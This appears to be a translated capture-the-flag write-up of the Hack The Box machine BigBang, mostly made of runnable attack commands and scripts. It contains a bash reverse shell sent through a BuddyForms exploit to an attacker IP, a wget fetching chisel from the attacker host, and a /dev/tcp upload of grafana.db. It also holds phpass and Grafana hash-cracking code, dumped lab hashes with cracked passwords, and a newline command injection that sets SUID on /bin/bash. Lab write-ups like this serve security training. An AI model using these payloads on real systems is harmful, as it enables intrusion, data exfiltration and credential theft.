Information gathering
nmap
nmap --min-rate 10000 -A 10.10.11.52
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 d4:15:77:1e:82:2b:2f:f1:cc:96:c6:28:c1:86:6b:3f (ECDSA)
|_ 256 6c:42:60:7b:ba:ba:67:24:0f:0c:ac:5d:be:92:0c:66 (ED25519)
80/tcp open http Apache httpd 2.4.62
|_http-title: Did not follow redirect to http://blog.bigbang.htb/
|_http-server-header: Apache/2.4.62 (Debian)
Add a hosts entry
sudo vim /etc/hosts
# add this line
10.10.11.52 blog.bigbang.htb
Wappalyzer plugin
The plugin identifies the site as WordPress.
wpscan
wpscan --url http://blog.bigbang.htb/ --enumerate u --api-token <Your-token>
[+] WordPress theme in use: twentytwentyfour
| Location: http://blog.bigbang.htb/wp-content/themes/twentytwentyfour/
| Last Updated: 2024-11-13T00:00:00.000Z
| Readme: http://blog.bigbang.htb/wp-content/themes/twentytwentyfour/readme.txt
| [!] The version is out of date, the latest version is 1.3
| [!] Directory listing is enabled
| Style URL: http://blog.bigbang.htb/wp-content/themes/twentytwentyfour/style.css
| Style Name: Twenty Twenty-Four
| Style URI: https://wordpress.org/themes/twentytwentyfour/
| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://blog.bigbang.htb/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <================================================================================> (10 / 10) 100.00% Time: 00:00:02
[i] User(s) Identified:
[+] root
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] shawking
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
wpscan --url http://blog.bigbang.htb/ --api-token <TOKEN>
Vulnerabilities reported for the twentytwentyfour theme
Vulnerabilities reported for the buddyforms plugin
For the buddyforms plugin:
Analysis: https://medium.com/tenable-techblog/wordpress-buddyforms-plugin-unauthenticated-insecure-deserialization-cve-2023-26326-3becb5575ed8
PoC: https://github.com/omarelshopky/exploit_cve-2023-26326_using_cve-2024-2961
CVE-2023-26326 is an unauthenticated insecure deserialization (phar://) in BuddyForms; the PoC chains it with CVE-2024-2961 (the glibc iconv overflow) to turn it into code execution through admin-ajax.php.
python exploit.py "<TARGET_URL>/wp-admin/admin-ajax.php" 'bash -c "bash -i >& /dev/tcp/<ATTACKER_IP>/<ATTACKER_PORT> 0>&1"'
nc -lvvp <ATTACKER_PORT>   # start the listener on the attacker box before firing the exploit
wp-config.php
/** Database username */
define( 'DB_USER', 'wp_user' );
/** Database password */
define( 'DB_PASSWORD', 'wp_password' );
/** Database hostname */
define( 'DB_HOST', '172.17.0.1' );
Connect with mysql -> the command is not present on the target
Note: 172.17.0.1 is usually the host's address on Docker's default bridge network -> and / contains .dockerenv -> so the shell is inside a container and the database runs on the Docker host
chisel proxy
The target shell has no mysql client -> we still need to get into the database -> so tunnel the port out and connect from our own machine
Get chisel onto the target with wget; serve it from a local Python HTTP server
Local (in the directory containing chisel): python -m http.server 90
Target: wget http://10.10.16.70:90/chisel && chmod +x chisel
Local (server side): chisel server --reverse --port 4444
Target shell: ./chisel client 10.10.16.70:4444 R:3306:172.17.0.1:3306
Local: mysql -h 127.0.0.1 -P 3306 -u wp_user -p
Reverse-tunnel syntax: R:<port opened on the chisel server>:<destination host>:<destination port>, so 127.0.0.1:3306 on the attacker box now reaches the Docker host's MySQL at 172.17.0.1:3306 through the compromised container
MySQL hashes
use wordpress;
select * from wp_users;
root:$P$Beh5HLRUlTi1LpLEAstRyXaaBOJICj1
shawking:$P$Br7LUHG9NjNk6/QSYm2chNHfxWdoK./
john user --wordlist=/usr/share/wordlists/rockyou.txt   # 'user' is a file holding the two login:hash lines above; john autodetects the phpass ($P$) format
john user --show
shawking:quantumphysics
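What john is actually doing with those $P$ hashes, as an added example written for this article (not part of the original writeup and not john's code): a Python implementation of the phpass "portable" hash that WordPress used for these accounts, plus a minimal dictionary attack on top of it. The two hashes are the wp_users rows dumped above; the three-word list is constructed and stands in for rockyou.txt.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# phpass's own base64 alphabet (not RFC 4648); it also indexes the iteration count
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes) -> str:
    """phpass encode64: packs bytes little-endian, 6 bits per output char."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password: str, salt: str, count_log2: int = 13) -> str:
    """Build a $P$ hash: MD5(salt+pw), then 2**count_log2 rounds of MD5(prev+pw).

    WordPress asks phpass for 8 rounds-log2; phpass adds 5 on PHP 5+, so the
    stored count char is ITOA64[13] == 'B' (8192 rounds), hence the "$P$B..." above.
    """
    if len(salt) != 8 or not 7 <= count_log2 <= 30:
        raise ValueError("phpass needs an 8-char salt and count_log2 in 7..30")
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    # 3 (prefix) + 1 (count) + 8 (salt) + 22 (encoded 16-byte digest) = 34 chars
    return "$P$" + ITOA64[count_log2] + salt + _encode64(digest)


def phpass_verify(password: str, stored: str) -> bool:
    """Recompute with the count and salt embedded in `stored` and compare."""
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        return False  # $H$ is the phpBB3 spelling of the same algorithm
    count_log2 = ITOA64.find(stored[3])
    if not 7 <= count_log2 <= 30:
        return False
    candidate = phpass_hash(password, stored[4:12], count_log2)
    return hmac.compare_digest(candidate[3:], stored[3:])


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: first word that verifies, else None (what john --wordlist does)."""
    for word in wordlist:
        if phpass_verify(word, stored):
            return word
    return None


if __name__ == "__main__":
    # The two wp_users rows dumped over the chisel tunnel above
    wp_users = {
        "root": "$P$Beh5HLRUlTi1LpLEAstRyXaaBOJICj1",
        "shawking": "$P$Br7LUHG9NjNk6/QSYm2chNHfxWdoK./",
    }
    # Constructed three-word list standing in for rockyou.txt
    words = ["password", "bigbang", "quantumphysics"]
    for user, h in wp_users.items():
        print(f"{user}:{crack(h, words)}")
```

8192 MD5 rounds per guess is why these hashes fall to rockyou in seconds; the count char is the only cost knob the format offers, which is why modern WordPress moved away from phpass.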
SSH - user.txt (log in as shawking:quantumphysics)
cat user.txt
netstat -antlp
tcp 0 0 127.0.0.1:43239 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9090 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN
These ports are in use and are not default ports of common services -> forward each one and test it
Port forwarding
ssh shawking@10.10.11.52 -L 3000:127.0.0.1:3000
ssh shawking@10.10.11.52 -L 9090:127.0.0.1:9090
Forwarding each in turn: port 3000 serves Grafana v11.0.0; on port 9090 dirsearch turns up a /login path
GET is not allowed -> it wants POST => judging by the path, a login endpoint
Port 3000 - Grafana
Googled the version for vulnerabilities -> found one (CVE-2024-9264, below) -> but it needs valid Grafana credentials => tried reusing the passwords found so far -> failed
https://github.com/nollium/CVE-2024-9264
Next step is to hunt for credentials -> /opt/data
The directory contains grafana.db, Grafana's SQLite database
(/opt is where third-party software gets installed, so it is a natural place to look for an application's data files)
Attacker box, start the listener first: nc -lvvp 1234 > grafana.db
Target: cat grafana.db > /dev/tcp/10.10.16.70/1234
This pushes the database file to the local machine for analysis
grafana2hashcat & hashcat
Inspecting the database: the user table stores each account's password hash together with a salt
Use the grafana2hashcat project on GitHub to convert them into a format hashcat can crack (PBKDF2-HMAC-SHA256, hashcat mode 10900)
https://github.com/iamaldi/grafana2hashcat
sha256:10000:NHVtZWJCSnVjdg==:foAYpCEO+66xLwEVWApHb+j5ik+braJyDmUmVIYMWduTV3sSIBwBUSVjddb4g/G42WA=:bigbang
hashcat recovers the plaintext: bigbang
developer:bigbang
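The conversion grafana2hashcat performs, as an added example written for this article (not the grafana2hashcat project's own code): Grafana's legacy password storage is PBKDF2-HMAC-SHA256 with 10000 iterations and a 50-byte derived key, kept hex-encoded in the user table next to a 10-character plaintext salt, and hashcat mode 10900 wants sha256:<iterations>:<base64 salt>:<base64 hash>. The salt is the one from the cracked line above; the database row is constructed in build_demo_db, and the table and column names (user, login, salt, password) are Grafana's.

```python
import base64
import hashlib
import hmac
import os
import sqlite3
import tempfile
from typing import Iterator, Tuple

# Grafana's legacy password storage: PBKDF2-HMAC-SHA256, 10000 iterations,
# 50-byte derived key stored hex-encoded next to a 10-character salt.
ITERATIONS = 10000
KEY_LEN = 50


def grafana_hash_hex(password: str, salt: str) -> str:
    """Reproduce the hex string Grafana writes to the user.password column."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), ITERATIONS, KEY_LEN)
    return dk.hex()


def to_hashcat(salt: str, password_hex: str) -> str:
    """Convert one row to hashcat -m 10900 form: sha256:<iter>:<b64 salt>:<b64 hash>."""
    b64_salt = base64.b64encode(salt.encode()).decode()
    b64_hash = base64.b64encode(bytes.fromhex(password_hex)).decode()
    return f"sha256:{ITERATIONS}:{b64_salt}:{b64_hash}"


def verify(password: str, hashcat_line: str) -> bool:
    """Check a candidate against a 10900 line; tolerates the ':<plain>' suffix a potfile appends."""
    algo, iters, b64_salt, b64_hash = hashcat_line.split(":")[:4]
    if algo != "sha256":
        raise ValueError(f"unsupported algorithm {algo!r}")
    salt = base64.b64decode(b64_salt)
    expected = base64.b64decode(b64_hash)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iters), len(expected))
    return hmac.compare_digest(dk, expected)


def dump_from_db(path: str) -> Iterator[Tuple[str, str]]:
    """Yield (login, hashcat_line) for every local account in a grafana.db file."""
    con = sqlite3.connect(path)
    try:
        for login, salt, pw_hex in con.execute("SELECT login, salt, password FROM user"):
            if pw_hex:  # accounts from external auth carry no local password hash
                yield login, to_hashcat(salt, pw_hex)
    finally:
        con.close()


def build_demo_db(password: str = "bigbang", salt: str = "4umebBJucv") -> str:
    """Write a throwaway grafana.db-shaped SQLite file holding one constructed row."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE user (login TEXT, salt TEXT, password TEXT)")
    con.execute(
        "INSERT INTO user VALUES (?, ?, ?)",
        ("developer", salt, grafana_hash_hex(password, salt)),
    )
    con.commit()
    con.close()
    return path


if __name__ == "__main__":
    for login, line in dump_from_db(build_demo_db()):
        # save these as hashes.txt, then: hashcat -m 10900 --username hashes.txt rockyou.txt
        print(f"{login}:{line}")
        print("constructed row verifies:", verify("bigbang", line))
    # The line hashcat cracked in the writeup (trailing ':bigbang' is the recovered plaintext)
    page_line = "sha256:10000:NHVtZWJCSnVjdg==:foAYpCEO+66xLwEVWApHb+j5ik+braJyDmUmVIYMWduTV3sSIBwBUSVjddb4g/G42WA=:bigbang"
    print("writeup hash verifies:", verify("bigbang", page_line))
```

verify() is the offline check to run on a cracked candidate before spending it against the live service; note that 10000 iterations of HMAC-SHA256 is cheap enough on a GPU that a dictionary password like this one falls quickly regardless of the salt.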
With the credential in hand, the CVE above still fails:
python CVE-2024-9264.py -u developer -p bigbang -c id http://localhost:3000
[+] Logged in as developer:bigbang
[+] Executing command: id
[-] DuckDB is not installed on the target system. This exploit requires DuckDB to be present in the system PATH.
Port 9090 - /login
Sent a POST with the HackBar plugin -> 415 status code -> the body must be application/json -> since it is a login endpoint, presumably a username/password JSON object
Tried it with curl -> the response carries a JWT:
curl -X POST 127.0.0.1:9090/login -H "Content-Type: application/json" -d '{"username":"developer","password":"bigbang"}'
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTc0NTQ5OTMwMiwianRpIjoiOTM0MzNjYTMtMTFmYy00NmE5LTg4YWEtNTNmOTM3ODQ3NTBmIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTc0NTQ5OTMwMiwiY3NyZiI6IjUxNWRjMjQyLTZhZWItNDg4Yy04ZmE3LTdmOThkN2M1ZjQ1MyIsImV4cCI6MTc0NTUwMjkwMn0.1hot0uOSMQOXJxwgBqKfVPmDv-7yXFDUY5yn5m5JlBg"}
The developer password works here too, so switch to developer inside the existing SSH session
Lateral movement -> developer
su developer
There is an .apk file... pulled it to the local machine the same way (/dev/tcp + nc) and decompiled it
Fed it to GPT for analysis
The jadx-gui decompilation (Java) looks different from what the Kali command-line tool produces (smali): apktool d a.apk -o apk
Found the script online; I don't know Java decompilation
import requests

# Reached through the SSH -L 9090 forward (or run directly on the target)
BASE = "http://127.0.0.1:9090"

# Step 1: /login only accepts application/json and answers with a JWT
login = requests.post(
    f"{BASE}/login",
    json={"username": "developer", "password": "bigbang"},
)
token = login.json()["access_token"]

headers = {
    "Content-Type": "application/json",
    "Authorization": f"Bearer {token}",
}
# Step 2: the newline inside output_file is the injection point (the extracted
# post rendered it as "foo n chmod"); the chmod after it sets the SUID bit on bash
payload = {"command": "send_image", "output_file": "foo\nchmod 4777 /bin/bash"}
response = requests.post(f"{BASE}/command", headers=headers, json=payload)
print("Status Code:", response.status_code)
print("Response Body:", response.text)
Run the script on the target -> the injected chmod sets the SUID bit on /bin/bash. Bash drops its effective uid unless started with the -p flag, so start the SUID bash with -p to keep root.
Summary
WordPress -> wpscan -> vulnerable plugin -> CVE -> shell
chisel tunnel to the database -> password hashes -> SSH login
Port forwarding -> Grafana -> credential hunt -> database file -> grafana2hashcat & hashcat -> developer password
APK decompiled -> smali -> /command endpoint on 9090 -> SUID bash -> root
Originally published on the WeChat public account 夜风Sec: HTB - BigBang